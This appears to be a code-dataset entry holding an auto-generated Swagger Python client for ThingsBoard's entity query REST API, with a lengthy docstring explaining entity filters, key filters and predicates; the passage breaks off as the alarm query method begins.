] | null | null | null | CLIENT_ADDRESS = '7dfef7aed2105b7eceb4d34e1ad84fdad4693bd5de041e1b47079efeb6001a83' | 83 | 83 | 0.939759 | 3 | 83 | 25.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.407407 | 0.024096 | 83 | 1 | 83 | 83 | 0.54321 | 0 | 0 | 0 | 0 | 0 | 0.761905 | 0.761905 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3215af869aa1e512a7f55a8d2d13822fb9ecf6c5 | 88,783 | py | Python | tb_rest_client/api/api_ce/entity_query_controller_api.py | samson0v/python_tb_rest_client | 08ff7898740f7cec2170e85d5c3c89e222e967f7 | [
"Apache-2.0"
] | 30 | 2020-06-19T06:42:50.000Z | 2021-08-23T21:16:36.000Z | tb_rest_client/api/api_ce/entity_query_controller_api.py | samson0v/python_tb_rest_client | 08ff7898740f7cec2170e85d5c3c89e222e967f7 | [
"Apache-2.0"
] | 25 | 2021-08-30T01:17:27.000Z | 2022-03-16T14:10:14.000Z | tb_rest_client/api/api_ce/entity_query_controller_api.py | samson0v/python_tb_rest_client | 08ff7898740f7cec2170e85d5c3c89e222e967f7 | [
"Apache-2.0"
] | 23 | 2020-07-06T13:41:54.000Z | 2021-08-23T21:04:50.000Z | # coding: utf-8
"""
ThingsBoard REST API
ThingsBoard open-source IoT platform REST API documentation. # noqa: E501
OpenAPI spec version: 3.3.3-SNAPSHOT
Contact: info@thingsboard.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class EntityQueryControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def count_entities_by_query_using_post(self, **kwargs): # noqa: E501
"""Count Entities by Query # noqa: E501
Allows to run complex queries to search the count of platform entities (devices, assets, customers, etc) based on the combination of main entity filter and multiple key filters. Returns the number of entities that match the query definition. # Query Definition Main **entity filter** is mandatory and defines generic search criteria. For example, \"find all devices with profile 'Moisture Sensor'\" or \"Find all devices related to asset 'Building A'\" Optional **key filters** allow to filter results of the entity filter by complex criteria against main entity fields (name, label, type, etc), attributes and telemetry. For example, \"temperature > 20 or temperature< 10\" or \"name starts with 'T', and attribute 'model' is 'T1000', and timeseries field 'batteryLevel' > 40\". Let's review the example: ```json { \"entityFilter\": { \"type\": \"entityType\", \"entityType\": \"DEVICE\" }, \"keyFilters\": [ { \"key\": { \"type\": \"ATTRIBUTE\", \"key\": \"active\" }, \"valueType\": \"BOOLEAN\", \"predicate\": { \"operation\": \"EQUAL\", \"value\": { \"defaultValue\": true, \"dynamicValue\": null }, \"type\": \"BOOLEAN\" } } ] } ``` Example mentioned above search all devices which have attribute 'active' set to 'true'. Now let's review available entity filters and key filters syntax: # Entity Filters Entity Filter body depends on the 'type' parameter. Let's review available entity filter types. In fact, they do correspond to available dashboard aliases. ## Single Entity Allows to filter only one entity based on the id. For example, this entity filter selects certain device: ```json { \"type\": \"singleEntity\", \"singleEntity\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"DEVICE\" } } ``` ## Entity List Filter Allows to filter entities of the same type using their ids. For example, this entity filter selects two devices: ```json { \"type\": \"entityList\", \"entityType\": \"DEVICE\", \"entityList\": [ \"e6501f30-2a7a-11ec-94eb-213c95f54092\", \"e6657bf0-2a7a-11ec-94eb-213c95f54092\" ] } ``` ## Entity Name Filter Allows to filter entities of the same type using the **'starts with'** expression over entity name. For example, this entity filter selects all devices which name starts with 'Air Quality': ```json { \"type\": \"entityName\", \"entityType\": \"DEVICE\", \"entityNameFilter\": \"Air Quality\" } ``` ## Entity Type Filter Allows to filter entities based on their type (CUSTOMER, USER, DASHBOARD, ASSET, DEVICE, etc)For example, this entity filter selects all tenant customers: ```json { \"type\": \"entityType\", \"entityType\": \"CUSTOMER\" } ``` ## Asset Type Filter Allows to filter assets based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'charging station' assets which name starts with 'Tesla': ```json { \"type\": \"assetType\", \"assetType\": \"charging station\", \"assetNameFilter\": \"Tesla\" } ``` ## Device Type Filter Allows to filter devices based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Temperature Sensor' devices which name starts with 'ABC': ```json { \"type\": \"deviceType\", \"deviceType\": \"Temperature Sensor\", \"deviceNameFilter\": \"ABC\" } ``` ## Edge Type Filter Allows to filter edge instances based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Factory' edge instances which name starts with 'Nevada': ```json { \"type\": \"edgeType\", \"edgeType\": \"Factory\", \"edgeNameFilter\": \"Nevada\" } ``` ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ``` ## Api Usage Filter Allows to query for Api Usage based on optional customer id. If the customer id is not set, returns current tenant API usage.For example, this entity filter selects the 'Api Usage' entity for customer with id 'e6501f30-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"apiUsageState\", \"customerId\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"CUSTOMER\" } } ``` ## Relations Query Filter Allows to filter entities that are related to the provided root entity. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'filter' object allows you to define the relation type and set of acceptable entity types to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only those who match the 'filters'. For example, this entity filter selects all devices and assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"relationsQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"filters\": [ { \"relationType\": \"Contains\", \"entityTypes\": [ \"DEVICE\", \"ASSET\" ] } ] } ``` ## Asset Search Query Allows to filter assets that are related to the provided root entity. Filters related assets based on the relation type and set of asset types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'assetTypes' defines the type of the asset to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only assets that match 'relationType' and 'assetTypes' conditions. For example, this entity filter selects 'charging station' assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"assetSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"assetTypes\": [ \"charging station\" ] } ``` ## Device Search Query Allows to filter devices that are related to the provided root entity. Filters related devices based on the relation type and set of device types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the type of the device to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Charging port' and 'Air Quality Sensor' devices which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"deviceTypes\": [ \"Air Quality Sensor\", \"Charging port\" ] } ``` ## Entity View Query Allows to filter entity views that are related to the provided root entity. Filters related entity views based on the relation type and set of entity view types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'entityViewTypes' defines the type of the entity view to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Concrete mixer' entity views which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"entityViewSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"entityViewTypes\": [ \"Concrete mixer\" ] } ``` ## Edge Search Query Allows to filter edge instances that are related to the provided root entity. Filters related edge instances based on the relation type and set of edge types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the type of the device to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Factory' edge instances which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"edgeTypes\": [ \"Factory\" ] } ``` # Key Filters Key Filter allows you to define complex logical expressions over entity field, attribute or latest time-series value. The filter is defined using 'key', 'valueType' and 'predicate' objects. Single Entity Query may have zero, one or multiple predicates. If multiple filters are defined, they are evaluated using logical 'AND'. The example below checks that temperature of the entity is above 20 degrees: ```json { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ``` Now let's review 'key', 'valueType' and 'predicate' objects in detail. ## Filter Key Filter Key defines either entity field, attribute or telemetry. It is a JSON object that consists the key name and type. The following filter key types are supported: * 'CLIENT_ATTRIBUTE' - used for client attributes; * 'SHARED_ATTRIBUTE' - used for shared attributes; * 'SERVER_ATTRIBUTE' - used for server attributes; * 'ATTRIBUTE' - used for any of the above; * 'TIME_SERIES' - used for time-series values; * 'ENTITY_FIELD' - used for accessing entity fields like 'name', 'label', etc. The list of available fields depends on the entity type; * 'ALARM_FIELD' - similar to entity field, but is used in alarm queries only; Let's review the example: ```json { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ``` ## Value Type and Operations Provides a hint about the data type of the entity field that is defined in the filter key. The value type impacts the list of possible operations that you may use in the corresponding predicate. For example, you may use 'STARTS_WITH' or 'END_WITH', but you can't use 'GREATER_OR_EQUAL' for string values.The following filter value types and corresponding predicate operations are supported: * 'STRING' - used to filter any 'String' or 'JSON' values. Operations: EQUAL, NOT_EQUAL, STARTS_WITH, ENDS_WITH, CONTAINS, NOT_CONTAINS; * 'NUMERIC' - used for 'Long' and 'Double' values. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; * 'BOOLEAN' - used for boolean values. Operations: EQUAL, NOT_EQUAL; * 'DATE_TIME' - similar to numeric, transforms value to milliseconds since epoch. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; ## Filter Predicate Filter Predicate defines the logical expression to evaluate. The list of available operations depends on the filter value type, see above. Platform supports 4 predicate types: 'STRING', 'NUMERIC', 'BOOLEAN' and 'COMPLEX'. The last one allows to combine multiple operations over one filter key. Simple predicate example to check 'value < 100': ```json { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 100, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ``` Complex predicate example, to check 'value < 10 or value > 20': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ``` More complex predicate example, to check 'value < 10 or (value > 50 && value < 60)': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"type\": \"COMPLEX\", \"operation\": \"AND\", \"predicates\": [ { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 50, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 60, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ] } ``` You may also want to replace hardcoded values (for example, temperature > 20) with the more dynamic expression (for example, temperature > 'value of the tenant attribute with key 'temperatureThreshold'). It is possible to use 'dynamicValue' to define attribute of the tenant, customer or user that is performing the API call. See example below: ```json { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\" } }, \"type\": \"NUMERIC\" } ``` Note that you may use 'CURRENT_USER', 'CURRENT_CUSTOMER' and 'CURRENT_TENANT' as a 'sourceType'. The 'defaultValue' is used when the attribute with such a name is not defined for the chosen source. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.count_entities_by_query_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityCountQuery body:
:return: int
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.count_entities_by_query_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.count_entities_by_query_using_post_with_http_info(**kwargs) # noqa: E501
return data
def count_entities_by_query_using_post_with_http_info(self, **kwargs): # noqa: E501
"""Count Entities by Query # noqa: E501
Allows to run complex queries to search the count of platform entities (devices, assets, customers, etc) based on the combination of main entity filter and multiple key filters. Returns the number of entities that match the query definition. # Query Definition Main **entity filter** is mandatory and defines generic search criteria. For example, \"find all devices with profile 'Moisture Sensor'\" or \"Find all devices related to asset 'Building A'\" Optional **key filters** allow to filter results of the entity filter by complex criteria against main entity fields (name, label, type, etc), attributes and telemetry. For example, \"temperature > 20 or temperature< 10\" or \"name starts with 'T', and attribute 'model' is 'T1000', and timeseries field 'batteryLevel' > 40\". Let's review the example: ```json { \"entityFilter\": { \"type\": \"entityType\", \"entityType\": \"DEVICE\" }, \"keyFilters\": [ { \"key\": { \"type\": \"ATTRIBUTE\", \"key\": \"active\" }, \"valueType\": \"BOOLEAN\", \"predicate\": { \"operation\": \"EQUAL\", \"value\": { \"defaultValue\": true, \"dynamicValue\": null }, \"type\": \"BOOLEAN\" } } ] } ``` Example mentioned above search all devices which have attribute 'active' set to 'true'. Now let's review available entity filters and key filters syntax: # Entity Filters Entity Filter body depends on the 'type' parameter. Let's review available entity filter types. In fact, they do correspond to available dashboard aliases. ## Single Entity Allows to filter only one entity based on the id. For example, this entity filter selects certain device: ```json { \"type\": \"singleEntity\", \"singleEntity\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"DEVICE\" } } ``` ## Entity List Filter Allows to filter entities of the same type using their ids. For example, this entity filter selects two devices: ```json { \"type\": \"entityList\", \"entityType\": \"DEVICE\", \"entityList\": [ \"e6501f30-2a7a-11ec-94eb-213c95f54092\", \"e6657bf0-2a7a-11ec-94eb-213c95f54092\" ] } ``` ## Entity Name Filter Allows to filter entities of the same type using the **'starts with'** expression over entity name. For example, this entity filter selects all devices which name starts with 'Air Quality': ```json { \"type\": \"entityName\", \"entityType\": \"DEVICE\", \"entityNameFilter\": \"Air Quality\" } ``` ## Entity Type Filter Allows to filter entities based on their type (CUSTOMER, USER, DASHBOARD, ASSET, DEVICE, etc)For example, this entity filter selects all tenant customers: ```json { \"type\": \"entityType\", \"entityType\": \"CUSTOMER\" } ``` ## Asset Type Filter Allows to filter assets based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'charging station' assets which name starts with 'Tesla': ```json { \"type\": \"assetType\", \"assetType\": \"charging station\", \"assetNameFilter\": \"Tesla\" } ``` ## Device Type Filter Allows to filter devices based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Temperature Sensor' devices which name starts with 'ABC': ```json { \"type\": \"deviceType\", \"deviceType\": \"Temperature Sensor\", \"deviceNameFilter\": \"ABC\" } ``` ## Edge Type Filter Allows to filter edge instances based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Factory' edge instances which name starts with 'Nevada': ```json { \"type\": \"edgeType\", \"edgeType\": \"Factory\", \"edgeNameFilter\": \"Nevada\" } ``` ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ``` ## Api Usage Filter Allows to query for Api Usage based on optional customer id. If the customer id is not set, returns current tenant API usage.For example, this entity filter selects the 'Api Usage' entity for customer with id 'e6501f30-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"apiUsageState\", \"customerId\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"CUSTOMER\" } } ``` ## Relations Query Filter Allows to filter entities that are related to the provided root entity. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'filter' object allows you to define the relation type and set of acceptable entity types to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only those who match the 'filters'. For example, this entity filter selects all devices and assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"relationsQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"filters\": [ { \"relationType\": \"Contains\", \"entityTypes\": [ \"DEVICE\", \"ASSET\" ] } ] } ``` ## Asset Search Query Allows to filter assets that are related to the provided root entity. Filters related assets based on the relation type and set of asset types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'assetTypes' defines the type of the asset to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only assets that match 'relationType' and 'assetTypes' conditions. For example, this entity filter selects 'charging station' assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"assetSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"assetTypes\": [ \"charging station\" ] } ``` ## Device Search Query Allows to filter devices that are related to the provided root entity. Filters related devices based on the relation type and set of device types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the type of the device to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Charging port' and 'Air Quality Sensor' devices which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"deviceTypes\": [ \"Air Quality Sensor\", \"Charging port\" ] } ``` ## Entity View Query Allows to filter entity views that are related to the provided root entity. Filters related entity views based on the relation type and set of entity view types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'entityViewTypes' defines the type of the entity view to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Concrete mixer' entity views which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"entityViewSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"entityViewTypes\": [ \"Concrete mixer\" ] } ``` ## Edge Search Query Allows to filter edge instances that are related to the provided root entity. Filters related edge instances based on the relation type and set of edge types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels should the query search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines either to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the type of the device to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match 'relationType' and 'deviceTypes' conditions. For example, this entity filter selects 'Factory' edge instances which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"edgeTypes\": [ \"Factory\" ] } ``` # Key Filters Key Filter allows you to define complex logical expressions over entity field, attribute or latest time-series value. The filter is defined using 'key', 'valueType' and 'predicate' objects. Single Entity Query may have zero, one or multiple predicates. If multiple filters are defined, they are evaluated using logical 'AND'. The example below checks that temperature of the entity is above 20 degrees: ```json { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ``` Now let's review 'key', 'valueType' and 'predicate' objects in detail. ## Filter Key Filter Key defines either entity field, attribute or telemetry. It is a JSON object that consists the key name and type. The following filter key types are supported: * 'CLIENT_ATTRIBUTE' - used for client attributes; * 'SHARED_ATTRIBUTE' - used for shared attributes; * 'SERVER_ATTRIBUTE' - used for server attributes; * 'ATTRIBUTE' - used for any of the above; * 'TIME_SERIES' - used for time-series values; * 'ENTITY_FIELD' - used for accessing entity fields like 'name', 'label', etc. The list of available fields depends on the entity type; * 'ALARM_FIELD' - similar to entity field, but is used in alarm queries only; Let's review the example: ```json { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ``` ## Value Type and Operations Provides a hint about the data type of the entity field that is defined in the filter key. The value type impacts the list of possible operations that you may use in the corresponding predicate. For example, you may use 'STARTS_WITH' or 'END_WITH', but you can't use 'GREATER_OR_EQUAL' for string values.The following filter value types and corresponding predicate operations are supported: * 'STRING' - used to filter any 'String' or 'JSON' values. Operations: EQUAL, NOT_EQUAL, STARTS_WITH, ENDS_WITH, CONTAINS, NOT_CONTAINS; * 'NUMERIC' - used for 'Long' and 'Double' values. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; * 'BOOLEAN' - used for boolean values. Operations: EQUAL, NOT_EQUAL; * 'DATE_TIME' - similar to numeric, transforms value to milliseconds since epoch. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; ## Filter Predicate Filter Predicate defines the logical expression to evaluate. The list of available operations depends on the filter value type, see above. Platform supports 4 predicate types: 'STRING', 'NUMERIC', 'BOOLEAN' and 'COMPLEX'. The last one allows to combine multiple operations over one filter key. Simple predicate example to check 'value < 100': ```json { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 100, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ``` Complex predicate example, to check 'value < 10 or value > 20': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ``` More complex predicate example, to check 'value < 10 or (value > 50 && value < 60)': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"type\": \"COMPLEX\", \"operation\": \"AND\", \"predicates\": [ { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 50, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 60, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ] } ``` You may also want to replace hardcoded values (for example, temperature > 20) with the more dynamic expression (for example, temperature > 'value of the tenant attribute with key 'temperatureThreshold'). It is possible to use 'dynamicValue' to define attribute of the tenant, customer or user that is performing the API call. See example below: ```json { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\" } }, \"type\": \"NUMERIC\" } ``` Note that you may use 'CURRENT_USER', 'CURRENT_CUSTOMER' and 'CURRENT_TENANT' as a 'sourceType'. The 'defaultValue' is used when the attribute with such a name is not defined for the chosen source. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.count_entities_by_query_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityCountQuery body:
:return: int
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method count_entities_by_query_using_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entitiesQuery/count', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='int', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_alarm_data_by_query_using_post(self, **kwargs): # noqa: E501
"""Find Alarms by Query # noqa: E501
